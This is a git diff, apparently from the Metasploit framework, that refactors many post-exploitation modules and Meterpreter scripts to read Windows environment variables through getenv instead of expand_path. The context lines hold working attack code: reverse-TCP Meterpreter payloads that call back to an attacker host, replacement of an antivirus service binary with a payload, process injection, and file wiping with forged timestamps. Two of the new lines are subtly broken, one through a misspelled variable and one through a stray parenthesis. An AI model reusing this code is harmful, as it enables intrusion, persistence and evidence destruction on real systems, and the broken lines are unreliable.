@ -35,7 +35,7 @@ class Metasploit3 < Msf::Post
|
|||
register_advanced_options(
|
||||
[
|
||||
OptString.new('EXEC_STRING', [false, 'Execution parameters when run from download directory' ]),
|
||||
OptInt.new('EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
|
||||
OptInt.new( 'EXEC_TIMEOUT', [true, 'Execution timeout', 60 ]),
|
||||
OptBool.new( 'DELETE', [true, 'Delete file after execution', false ]),
|
||||
], self.class)
|
||||
|
||||
|
@ -76,16 +76,16 @@ class Metasploit3 < Msf::Post
|
|||
url = datastore["URL"]
|
||||
filename = datastore["FILENAME"] || url.split('/').last
|
||||
|
||||
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
|
||||
if download_path.nil? or download_path.empty?
|
||||
path = session.fs.file.expand_path("%TEMP%")
|
||||
path = datastore['DOWNLOAD_PATH']
|
||||
if path.blank?
|
||||
path = session.sys.config.getenv('TEMP')
|
||||
else
|
||||
path = download_path
|
||||
path = session.fs.file.expand_path(path)
|
||||
end
|
||||
|
||||
outpath = path + '\\' + filename
|
||||
exec = datastore['EXECUTE']
|
||||
exec_string = datastore['EXEC_STRING'] || ''
|
||||
exec_string = datastore['EXEC_STRING']
|
||||
output = datastore['OUTPUT']
|
||||
remove = datastore['DELETE']
|
||||
|
||||
|
@ -108,11 +108,7 @@ class Metasploit3 < Msf::Post
|
|||
# Execute file upon request
|
||||
if exec
|
||||
begin
|
||||
cmd = "#{outpath} #{exec_string}"
|
||||
|
||||
# If we don't have the following gsub, we get this error in Windows:
|
||||
# "Operation failed: The system cannot find the file specified"
|
||||
cmd = cmd.gsub(/\\/, '\\\\\\').gsub(/\s/, '\ ')
|
||||
cmd = "\"#{outpath}\" #{exec_string}"
|
||||
|
||||
print_status("Executing file: #{cmd}")
|
||||
res = cmd_exec(cmd, nil, datastore['EXEC_TIMEOUT'])
|
||||
|
|
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def create_pac(local_pac)
|
||||
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
|
||||
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
|
||||
conf_pac = ""
|
||||
|
||||
if ::File.exists?(local_pac)
|
||||
|
|
|
@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
|
|||
# Creates a temp notepad.exe to inject payload in to given the payload
|
||||
# Returns process PID
|
||||
def create_temp_proc(pay)
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
windir = client.sys.config.getenv('windir')
|
||||
# Select path of executable to run depending the architecture
|
||||
if pay.arch.join == "x86" and client.platform =~ /x86/
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
|
|
|
@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
|
|||
else
|
||||
print_status("Rpcap service found: #{serv['Name']}")
|
||||
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
|
||||
prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
|
||||
# TODO: check if this works on x64
|
||||
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
|
||||
if reg != 2
|
||||
print_status("Setting rpcapd as 'auto' service")
|
||||
service_change_startup("rpcapd","auto")
|
||||
|
|
|
@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
# set profile paths
|
||||
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
|
||||
os = @host_info['OS']
|
||||
profiles_path = sysdrive + "\\Documents and Settings\\"
|
||||
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/
|
||||
|
|
|
@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
#Function to calculate the size of the cluster
|
||||
def size_cluster()
|
||||
drive = expand_path("%SystemDrive%")
|
||||
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
|
||||
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
|
||||
print_status("Cluster Size: #{cluster}")
|
||||
|
||||
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
#Function to calculate the real file size on disk (file size + slack space)
|
||||
def size_on_disk(file)
|
||||
size_file = client.fs.file.stat(file).size;
|
||||
size_file = session.fs.file.stat(file).size;
|
||||
print_status("Size of the file: #{size_file}")
|
||||
|
||||
if (size_file<800)
|
||||
|
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
|
|||
rsec= Rex::Text.rand_text_numeric(7,bad='012')
|
||||
date = Time.now - rsec.to_i
|
||||
print_status("Changing MACE attributes")
|
||||
client.priv.fs.set_file_mace(file, date,date,date,date)
|
||||
session.priv.fs.set_file_mace(file, date,date,date,date)
|
||||
end
|
||||
|
||||
#Function to overwrite the file
|
||||
def file_overwrite(file,type,n)
|
||||
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
|
||||
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
||||
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
||||
handle=r['return']
|
||||
real_size=size_on_disk(file)
|
||||
|
||||
|
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
|
||||
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
||||
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
|
||||
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
|
||||
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
||||
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
|
||||
|
||||
if w['return']==false
|
||||
print_error("The was an error writing to disk, check permissions")
|
||||
|
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
|
|||
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
|
||||
end
|
||||
|
||||
client.railgun.kernel32.CloseHandle(handle)
|
||||
session.railgun.kernel32.CloseHandle(handle)
|
||||
change_mace(file)
|
||||
|
||||
#Generate a long random file name before delete it
|
||||
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
|
|||
print_status("Changing file name")
|
||||
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
|
||||
client.railgun.kernel32.MoveFileA(file,newname)
|
||||
session.railgun.kernel32.MoveFileA(file,newname)
|
||||
|
||||
file_rm(newname)
|
||||
print_good("File erased!")
|
||||
|
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
|
|||
#Check if the file is encrypted or compressed
|
||||
def comp_encr(file)
|
||||
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
|
||||
handle=client.railgun.kernel32.GetFileAttributesA(file)
|
||||
handle=session.railgun.kernel32.GetFileAttributesA(file)
|
||||
type= handle['return']
|
||||
|
||||
#FILE_ATTRIBUTE_COMPRESSED=0x800
|
||||
|
|
|
@ -61,7 +61,7 @@ def enum_users(os)
|
|||
user = @client.sys.config.getuid
|
||||
userpath = nil
|
||||
useroffcpath = nil
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
userpath = sysdrv + "\\Users\\"
|
||||
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
||||
|
@ -83,7 +83,7 @@ def enum_users(os)
|
|||
users << userinfo
|
||||
end
|
||||
else
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userpath'] = userpath + uservar + lnkpath
|
||||
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
||||
|
|
|
@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
|
|||
#
|
||||
# Upload to the filesystem
|
||||
#
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
tempexe.gsub!("\\\\", "\\")
|
||||
|
||||
|
|
|
@ -195,7 +195,7 @@ host = session.session_host
|
|||
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
|
||||
::FileUtils.mkdir_p(@log_dir)
|
||||
|
||||
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
|
||||
os = @host_info['OS']
|
||||
if os =~ /(Windows 7|2008|Vista)/
|
||||
@profiles_path = sysdrive + "\\Users\\"
|
||||
|
@ -218,7 +218,7 @@ if is_system?
|
|||
print_status "users found: #{usernames.join(", ")}"
|
||||
else
|
||||
print_status "running as user '#{uid}'..."
|
||||
usernames << client.fs.file.expand_path("%USERNAME%")
|
||||
usernames << client.sys.config.getenv('USERNAME')
|
||||
prepare_railgun
|
||||
end
|
||||
|
||||
|
|
|
@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
|
|||
if frfxchk
|
||||
user = @client.sys.config.getuid
|
||||
if not is_system?
|
||||
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
|
||||
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
|
||||
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
|
||||
usrname = envs['USERNAME']
|
||||
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
|
||||
if kill_frfx
|
||||
kill_firefox
|
||||
end
|
||||
|
|
|
@ -22,7 +22,7 @@ def enum_users
|
|||
users = []
|
||||
user = @client.sys.config.getuid
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
path4users = sysdrv + "\\Users\\"
|
||||
|
@ -43,7 +43,7 @@ def enum_users
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||
users << userinfo
|
||||
|
@ -83,7 +83,7 @@ def enum_powershell
|
|||
end
|
||||
if powershell_version =~ /2./
|
||||
print_status("Powershell Modules:")
|
||||
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
|
||||
powershell_module_path = @client.sys.config.getenv('PSModulePath')
|
||||
@client.fs.dir.foreach(powershell_module_path) do |m|
|
||||
next if m =~ /^(\.|\.\.)$/
|
||||
print_status("\t#{m}")
|
||||
|
|
|
@ -223,7 +223,7 @@ def enum_users
|
|||
users = []
|
||||
user = @client.sys.config.getuid
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /7|Vista|2008/
|
||||
path4users = sysdrv + "\\users\\"
|
||||
|
@ -244,7 +244,7 @@ def enum_users
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||
users << userinfo
|
||||
|
|
|
@ -18,13 +18,12 @@ def list_env_vars(var_names)
|
|||
"Name",
|
||||
"Value"
|
||||
])
|
||||
var_names.flatten.each do |v|
|
||||
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
|
||||
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
|
||||
tbl << [k, v]
|
||||
end
|
||||
print("\n" + tbl.to_s + "\n")
|
||||
end
|
||||
|
||||
|
||||
opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
|
|
|
@ -114,7 +114,7 @@ def enum_users(os)
|
|||
users = []
|
||||
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /7|Vista|2008/
|
||||
path4users = sysdrv + "\\users\\"
|
||||
|
@ -135,7 +135,7 @@ def enum_users(os)
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + path2purple
|
||||
users << userinfo
|
||||
|
|
|
@ -145,7 +145,7 @@ def enum_users(os)
|
|||
users = []
|
||||
|
||||
path4users = ""
|
||||
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
|
||||
sysdrv = @client.sys.config.getenv('SystemDrive')
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
path4users = sysdrv + "\\users\\"
|
||||
|
@ -166,7 +166,7 @@ def enum_users(os)
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = @client.fs.file.expand_path("%USERNAME%")
|
||||
uservar = @client.sys.config.getenv('USERNAME')
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + path2purple
|
||||
users << userinfo
|
||||
|
|
|
@ -301,7 +301,7 @@ def checkdep(session)
|
|||
tmpout = ""
|
||||
depmode = ""
|
||||
# Expand environment %TEMP% variable
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
tmp = session.sys.config.getenv('TEMP')
|
||||
# Create random name for the wmic output
|
||||
wmicfile = sprintf("%.5d",rand(100000))
|
||||
wmicout = "#{tmp}\\#{wmicfile}"
|
||||
|
|
|
@ -30,7 +30,7 @@ end
|
|||
|
||||
record = ""
|
||||
#Set path to the hosts file
|
||||
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
|
||||
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
|
||||
#Function check if UAC is enabled
|
||||
def checkuac(session)
|
||||
winver = session.sys.config.sysinfo
|
||||
|
|
|
@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
|
|||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Change to our working directory.
|
||||
workingdir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
|
||||
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
|
||||
client.fs.dir.chdir(workindir)
|
||||
|
||||
# Create a backup of the original exe.
|
||||
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
|
||||
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
|
||||
|
||||
# Place our newly created exe with the orginal binary name.
|
||||
tempdir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
|
||||
tempexe = workingdir + "PAVSRV51.EXE"
|
||||
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
|
|
|
@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
|
|||
if target_dir
|
||||
tempdir = target_dir
|
||||
else
|
||||
tempdir = @client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = @client.sys.config.getenv('TEMP')
|
||||
end
|
||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
||||
fd = @client.fs.file.new(tempvbs, "wb")
|
||||
|
|
|
@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
|
|||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Place our newly created exe in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
|
|
|
@ -19,7 +19,7 @@ require 'digest/sha1'
|
|||
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
|
||||
)
|
||||
|
||||
@tempdir = @session.fs.file.expand_path("%TEMP%")
|
||||
@tempdir = @session.sys.config.getenv('TEMP')
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def read_program_list
|
||||
|
|
|
@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
|
|||
runfail = 0
|
||||
runningas = session.sys.config.getuid
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
tmp = session.sys.config.getenv('TEMP')
|
||||
# Temporary file on windows host to store results
|
||||
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
|
||||
|
||||
|
|
|
@ -179,7 +179,7 @@ end
|
|||
#---------------------------------------------------------------------------------------------------------
|
||||
|
||||
def upload(session,file)
|
||||
location = session.fs.file.expand_path("%TEMP%")
|
||||
location = session.sys.config.getenv('TEMP')
|
||||
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
|
||||
print_status("Uploading #{file}....")
|
||||
session.fs.file.upload_file("#{fileontrgt}","#{file}")
|
||||
|
|
|
@ -99,6 +99,10 @@ upload_fn = nil
|
|||
end
|
||||
}
|
||||
|
||||
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
|
||||
sysdir = envs['SystemRoot']
|
||||
tmpdir = envs['TEMP']
|
||||
|
||||
# Must have at least one of -c or -u
|
||||
if not cmd and not upload_fn
|
||||
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
|
||||
|
@ -110,9 +114,8 @@ if not cmd and not upload_fn
|
|||
raw = pay.generate
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
#and placing it on the target in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
|
||||
cmd = tempdir + "\\" + tempexename + ".exe"
|
||||
cmd = tmpdir + "\\" + tempexename + ".exe"
|
||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
|
||||
fd = client.fs.file.new(cmd, "wb")
|
||||
fd.write(exe)
|
||||
|
@ -139,8 +142,6 @@ end
|
|||
#
|
||||
# Upload the payload command if needed
|
||||
#
|
||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
||||
if upload_fn
|
||||
begin
|
||||
location = tmpdir.dup
|
||||
|
|
|
@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
|
|||
unsupported if client.platform !~ /win32|win64/i
|
||||
begin
|
||||
|
||||
tmp = client.fs.file.expand_path("%TEMP%")
|
||||
tmp = client.sys.config.getenv('TEMP')
|
||||
|
||||
print_status("Gathering basic system information...")
|
||||
|
||||
|
|
|
@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val|
|
|||
end
|
||||
end
|
||||
|
||||
envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
|
||||
tempdir = envs['TEMP']
|
||||
sysdir = envs['SYSTEMROOT']
|
||||
|
||||
# Get the exe payload.
|
||||
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
||||
pay.datastore['LHOST'] = rhost
|
||||
|
@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport
|
|||
raw = pay.generate
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
#and placing it on the target in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
|
||||
tempexe = tempdir + "\\" + tempexename + ".exe"
|
||||
tempexe = "#{tempdir}\\#{tempexename}.exe"
|
||||
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
fd.write(exe)
|
||||
|
@ -129,7 +132,7 @@ service_list.each do |serv|
|
|||
moved = false
|
||||
configed = false
|
||||
#default path, but there should be an ImagePath registry key
|
||||
source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
|
||||
source = "#{sysdir}\\system32\\#{serv}.exe")
|
||||
#get path to exe; parse out quotes and arguments
|
||||
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
|
||||
sourcemaybe = client.fs.file.expand_path(sourceorig)
|
||||
|
|
|
@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
|
|||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Place our newly created exe in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
|
|
|
@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
|
|||
raise "File to Upload does not exists!"
|
||||
else
|
||||
if trgloc == ""
|
||||
location = session.fs.file.expand_path("%TEMP%")
|
||||
location = session.sys.config.getenv('TEMP')
|
||||
else
|
||||
location = trgloc
|
||||
end
|
||||
|
|
|
@ -32,7 +32,7 @@ def upload(session,file,trgloc)
|
|||
if not ::File.exists?(file)
|
||||
raise "File to Upload does not exists!"
|
||||
else
|
||||
@location = session.fs.file.expand_path("%TEMP%")
|
||||
@location = session.sys.config.getenv('TEMP')
|
||||
begin
|
||||
ext = file.scan(/\S*(.exe)/i)
|
||||
if ext.join == ".exe"
|
||||
|
|
|
@ -152,7 +152,7 @@ else
|
|||
#
|
||||
# Upload to the filesystem
|
||||
#
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempdir = client.sys.config.getenv('TEMP')
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
tempexe.gsub!("\\\\", "\\")
|
||||
|
||||
|
|
|
@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
|
|||
raise "File to Upload does not exists!"
|
||||
else
|
||||
if trgloc == nil
|
||||
location = client.fs.file.expand_path("%TEMP%")
|
||||
location = client.sys.config.getenv('TEMP')
|
||||
else
|
||||
location = trgloc
|
||||
end
|
||||
|
|
|
@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
|
|||
@client.response_timeout=120
|
||||
|
||||
begin
|
||||
tmp = @client.fs.file.expand_path("%TEMP%")
|
||||
tmp = @client.sys.config.getenv('TEMP')
|
||||
|
||||
wmiccmds.each do |wmi|
|
||||
if i < 10
|
||||
|
@ -409,7 +409,7 @@ end
|
|||
def chmace(cmds)
|
||||
windir = ''
|
||||
print_status("Changing Access Time, Modified Time and Created Time of Files Used")
|
||||
windir = @client.fs.file.expand_path("%WinDir%")
|
||||
windir = @client.sys.config.getenv('WinDir')
|
||||
cmds.each do |c|
|
||||
begin
|
||||
@client.core.use("priv")
|
||||
|
@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
|
|||
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
|
||||
garbage = ''
|
||||
hives = %w{HKCU HKLM HKCC HKCR HKU}
|
||||
windir = @client.fs.file.expand_path("%WinDir%")
|
||||
windir = @client.sys.config.getenv('WinDir')
|
||||
print_status('Dumping and Downloading the Registry')
|
||||
hives.each do |hive|
|
||||
begin
|
||||
|
|
|
@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
|
|||
tmpout = ''
|
||||
session.response_timeout=120
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
tmp = session.sys.config.getenv('TEMP')
|
||||
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
|
||||
wmiccmds.each do |wmi|
|
||||
print_status "running command wmic #{wmi}"
|
||||
|
|
Loading…
Reference in New Issue